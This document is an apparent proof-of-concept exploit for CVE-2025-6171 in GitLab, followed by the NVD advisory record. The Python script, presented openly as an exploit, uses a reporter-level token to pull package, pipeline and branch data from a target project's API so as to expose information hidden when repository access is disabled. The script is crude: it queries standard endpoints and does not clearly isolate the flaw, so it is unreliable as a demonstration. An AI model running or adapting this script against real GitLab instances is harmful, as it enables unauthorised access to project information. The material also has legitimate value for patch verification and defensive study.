CVE-2025-6171

# CVE-2025-6171 PoC - GitLab packages API Information Disclosure # Requires: Authenticated user with reporter access to a GitLab project # Affected Versions: < 18.3.6, 18.4 < 18.4.4, 18.5 < 18.5.2 import requests import json def exploit_gitlab_cve_2025_6171(gitlab_url, private_token, project_id): """ Exploit CVE-2025-6171 to retrieve branch names and pipeline details via packages API endpoint even when repository access is disabled. Parameters: - gitlab_url: Target GitLab instance URL - private_token: GitLab personal access token with reporter access - project_id: Target project ID Returns: Dictionary containing leaked information """ headers = { 'PRIVATE-TOKEN': private_token, 'Content-Type': 'application/json' } leaked_info = {'branches': [], 'pipelines': [], 'packages': []} # Exploit 1: Access packages API to leak branch names packages_url = f"{gitlab_url}/api/v4/projects/{project_id}/packages" response = requests.get(packages_url, headers=headers) if response.status_code == 200: packages_data = response.json() leaked_info['packages'] = packages_data print(f"[+] Successfully retrieved {len(packages_data)} package entries") print(f"[+] This may reveal branch names and pipeline details") # Exploit 2: Direct pipeline access via API pipelines_url = f"{gitlab_url}/api/v4/projects/{project_id}/pipelines" response = requests.get(pipelines_url, headers=headers) if response.status_code == 200: pipelines_data = response.json() leaked_info['pipelines'] = pipelines_data print(f"[+] Successfully retrieved {len(pipelines_data)} pipeline entries") # Exploit 3: List branches (if accessible) branches_url = f"{gitlab_url}/api/v4/projects/{project_id}/repository/branches" response = requests.get(branches_url, headers=headers) if response.status_code == 200: branches_data = response.json() leaked_info['branches'] = [b['name'] for b in branches_data] print(f"[+] Successfully retrieved {len(branches_data)} branch names") return leaked_info def main(): gitlab_url = "https://gitlab.example.com" private_token = "your-personal-access-token" project_id = 12345 result = exploit_gitlab_cve_2025_6171(gitlab_url, private_token, project_id) print(json.dumps(result, indent=2)) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-6171", "sourceIdentifier": "[email protected]", "published": "2025-11-15T08:15:46.060", "lastModified": "2025-11-20T21:09:38.063", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.2 before 18.3.6, 18.4 before 18.4.4, and 18.5 before 18.5.2 that could have allowed an authenticated attacker with reporter access to view branch names and pipeline details by accessing the packages API endpoint even when repository access was disabled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "13.2.0", "versionEndExcluding": "18.3.6", "matchCriteriaId": "5D9621B6-120A-4697-95AF-A79BE88C0971"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "13.2.0", "versionEndExcluding": "18.3.6", "matchCriteriaId": "A5F24C1A-3D89-40FA-806E-A48A941D3424"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.4.4", "matchCriteriaId": "36824F52-C9A0-4FB3-91F3-05593E3551E8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.4.4", "matchCriteriaId": "6D0A238D-1278-4D05-86F5-4C323E0CFE36"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.2", "matchCriteriaId": "7E85D20B-EEE1-4CC9-B50A-4040972287D8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.2", "matchCriteriaId": "B2A3A57F-C750-4C92-8C2B-C5FCF1D70F4F"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/11/12/patch-release-gitlab-18-5-2-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/549730", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3183740", "source": "[email protected]", "tags": ["Permissions Required"]}]}}